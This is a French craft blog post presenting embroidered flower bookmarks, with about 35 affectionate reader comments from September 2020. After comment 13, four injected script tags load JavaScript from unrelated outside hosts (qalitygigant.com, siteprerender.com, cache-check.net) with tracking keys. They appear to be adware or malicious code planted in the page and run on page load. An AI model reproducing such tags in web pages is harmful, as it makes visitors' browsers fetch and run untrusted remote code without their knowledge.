• Marque-Pages fleuris

     

     

    Marque-Pages fleuris

     

    ( Décliné en "Bonjour" à retrouver dans la Rubrique du même nom "Automne" ICI )

     

     

    J'espère que la rentrée de vos enfants ou petits enfants s'est bien passé.... Malgré les contraintes....

    La mienne est ravie alors tant mieux... Ceci dit, après ce qu'elle m'a raconté de son passage au self du lycée, j'ai beaucoup de doute sur le respect des normes....

    Aujourd'hui, une petite série de marque-pages d'après de petites broderies...

     

     

     

    Marque-Pages fleuris

     

     

     

     

    Marque-Pages fleuris

     

     

     

     

    Marque-Pages fleuris

     

     

     

     

    Marque-Pages fleuris

     

     

     

     

    Marque-Pages fleuris

     

     

     

     

    Marque-Pages fleuris

     

     

     

     

    Marque-Pages fleuris

     

    ( A retrouver dans la Rubrique "Bisous"-"Automne" ICI )

     

     

     

     

    Marque-Pages fleuris

     

    ( à retrouver dans la Rubrique "Jours"-"Vendredi"-"Automne" ICI )

    ( Décliné en "Week-End" dans la Rubrique du même nom "Automne" ICI )

     

     


    Tags Tags : , , , , ,
  • Commentaires

    35
    Tite-C.
    Samedi 12 Septembre 2020 à 22:03

    Très belles créations!  Je m'en servirais bien...  Bonne nuit ma belle xoxo

    34
    Mercredi 9 Septembre 2020 à 10:03

    Il me semble bien en avoir reconnu un en particulier ;-) 
    Oui pas facile la rentrée dans ces conditions, mais à dire vrai rien n'est simple !! Et comme chacun fait à sa sauce ... difficile de faire appliquer !!
    En tout cas prenez bien soin de vous tous ! 
    Gros Bisous 

    33
    Mardi 8 Septembre 2020 à 20:06

    Très jolis tes marques-pages brodées, bravo

    Gros bisous Pierrette67

    32
    Dimanche 6 Septembre 2020 à 21:37
    bibikafeine

    très jolis marques-pages. bises

    31
    Dimanche 6 Septembre 2020 à 19:09

    Je suis impressionnée par le travail fourni! plein de belles choses!! Je suis fan Bravo

    Bonne fin de semaine

    Marion

    30
    Dimanche 6 Septembre 2020 à 11:15

    tes marques pages sont bien beaux fleuris a souhait Les normes respectés ça se saurait si s etait le cas pour ma par doute, y a qu a regardé les gens qui rale pour le port du masque en magasin ....

    bisous

    29
    Dimanche 6 Septembre 2020 à 10:49

    Trop belles tes petites broderies!! Vraiment j'adore et bravo à toi pour ce travail minutieux......

    Bisous et doux dimanche

    28
    Qinoa
    Dimanche 6 Septembre 2020 à 07:55
    Très jolis marques/page, avec cela commence ne pas lire et lire encore
    Bzz
    27
    Samedi 5 Septembre 2020 à 21:46
    C'est ravissant tu as le chic pour faire des petites merveilles bravo valie je te souhaite un bon dimanche ggbisous
    26
    Jacline-H-49
    Samedi 5 Septembre 2020 à 17:21

    Bonjour ma Valie, 

    c'est sur que le coup de coeur est pour l'iris !!! Mais bien belles aussi les autres, et chapeau pour la patience, et avoir de bons n'oeils ! 

    Bonne fin de ce samedi et bon dimanche ensuite. 

    Ciel légèrement voilé qu'en sera-t-il demain ?? 

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    25
    Samedi 5 Septembre 2020 à 14:58

    Oh Valie que j'aime ces petites choses que tu fais avec tellement d'Amour...C'est vraiment superbe.

    Merci de nous montrer combien tu as des doigts de Fées...Bon Weekend ma Douce Amie.

    Plein de Gros Bisous.

    Je me suis grandement servie de plein de choses.

    Bravo,c'est génial*A Lundi***

    24
    Samedi 5 Septembre 2020 à 14:00

    Bonjour ma chère Valie

    Un grand merci d'avance tu es adorable

    Bonne journée et bon dimanche

    gros bisous

    Janine

     

    23
    Samedi 5 Septembre 2020 à 11:44

    Tes fleurs brodées transformées en marque-page sont splendides !!!

    Bises

    thaly 

    22
    Samedi 5 Septembre 2020 à 10:25

    Une belle invitation à lire avec tes marque-pages tous bien jolis

    Broderie à petits points quel travail 

    Merci pour le partage

    Bon week-end

    Bisous

     

    Mon blog automne est ouvert, j'ai fermé l'autre

    Voici l'adresse

    ambrounette-design.eklablog.com

     

     

    21
    Samedi 5 Septembre 2020 à 00:05

    bonsoir Valie

    tes marques page sont superbes j'aime celui avec l'iris bravo pour la patience .

    je te souhaite un doux weekend  

    bisous Frane

    20
    Vendredi 4 Septembre 2020 à 23:57

    C'est vraiment adorable ma belle Valie. Passe un beau samedi, gros bisous tendresse !

    19
    Vendredi 4 Septembre 2020 à 22:24

    trois magnifiques marques pages bravo pour la broderie bonne nuit bisous liliane

    18
    Vendredi 4 Septembre 2020 à 20:09

    Bonsoir ma douce Valie

    Un grand merci pour tes voeux pour mon anniversaire 

    je t'apprécie beaucoup  ainsi que ton amitié.

    Je te souhaite une bonne soirée et un bon week-end à venir

    Gros bisous et bravo pour tes travaux qui sont tous très beaux ainsi que tes créations.

    Janine

    17
    Vendredi 4 Septembre 2020 à 17:46

    Très sympa tes marque-pages et surtout c'est original. c'est top pour ta fille.

    Gros bisous, bon fin de journée.

    16
    Jeannine (cristal24)
    Vendredi 4 Septembre 2020 à 16:51

    Bravo pour tes marque-pages brodés, ils sont très jolis.

    Bonne fin de semaine, en profitant du soleil qu'on a encore un peu.

    Bises.

    Jeannine

    15
    Vendredi 4 Septembre 2020 à 14:58
    lamanuelle25

    Magnifiques ces marque-pages, mon préféré l'iris!! Bravo! Bises Nadine

    14
    Vendredi 4 Septembre 2020 à 14:07

    Trop beaux tes tits marque-pages ma Valie, Bravo !!!

    Contente que ta Fifille soit ravie de sa nouvelle rentrée scolaire, Super !

    Pour mon tit Jules seconde rentrée de maternelle, moyenne section, il mange à la cantine uniquement les vendredis, une Amie qui y travaille m'a envoyé il y a une heure, deux photos de lui à table avec copines, copains, ça s'est bien passé, pas de pleur !! Quant au respect des normes comme tu l'écris... ??!!

    Mille Bisous ma tite Valie.

    13
    mamijojo77100
    Vendredi 4 Septembre 2020 à 13:10

    moi qui est tendance a faire des marques pages assez grands, lol  je trouve les tiens charmants  ainsi brodes. BRAVO.. OH OUI vaut mieux ne pas etre derriere eux tous a la cantine!!!!!!!!!  on image GBISOUS ET BON WE ensoleille  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1599217666438" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    12
    Vendredi 4 Septembre 2020 à 11:12

    magnifiques tes créas ! bravo

    bisous

    11
    Vendredi 4 Septembre 2020 à 11:06

    Mignons tes petits marque-pages.

    Bonne journée.
    Bises.

    10
    Vendredi 4 Septembre 2020 à 10:30

    Ils sont très beaux ma Valie c est du travail de précision il faut compter et recompter et ne pas se tromper , moi qui adore lire j ai toujours des marque pages car j ai horreur d un livre écorné

    Bon vendredi ma douce et porte toi bien surtout bisous tendresse

    9
    Vendredi 4 Septembre 2020 à 09:42

    De bien  jolis  marques  page  avec  de  belles  broderies   bravo 

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    8
    marianne pirotte
    Vendredi 4 Septembre 2020 à 09:36

    Des créations toutes mignonnes !!

    Gros bisous

    Marianne

    7
    Vendredi 4 Septembre 2020 à 09:03

    Une rentrée réussie pour nos petits enfants cette année pour 2 d'entres eux, grande rentrée le collège et le lycée. Très jolies broderies. Bonne journée. Bisous

    6
    Vendredi 4 Septembre 2020 à 09:03

    C'est vraiment très joli !

    bonne journée ; bisous / Nicole

    5
    Jour de mai
    Vendredi 4 Septembre 2020 à 08:48

    Coucou Valie, 

    Un billet très joli avec tes broderies qui sont ravissantes, j'ai une rose que me dit bonjour chaque jour. 

    La rentrée est faite mais avec quelques dysfonctionnements on dirait !!!!! Rien n'est parfait mais il y a quand même des règles à respecter. 

    Bonne journée qui pour nous est actuellement sous le brouillard qui est monté très rapidement alors qu'il n'y avait rien au réveil. 

    Bon Vendredi et de Gros bisous ♥♥♥♥

    LN

    4
    Vendredi 4 Septembre 2020 à 08:12

    hello Valie 

    travail minutieux mais combien beau 

    bravo

    passe un bon weekend , on se retrouve lundi

    bisous

    3
    Vendredi 4 Septembre 2020 à 07:42
    De bien jolies broderies

    Fabian reprend aujourdhui affaire a suivre
    Bisous belle journée
    2
    Vendredi 4 Septembre 2020 à 07:34

    Trop trop beaux tes marque-pages !

    Bonne journée !

    Bisous bisous !

    1
    Vendredi 4 Septembre 2020 à 07:10

    Bonjour ma Valie, voilà encore de très belle créations.. bravo à toi !!

    Et encore merci pour ta somptueuse carte.

    Bon vendredi 

    bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :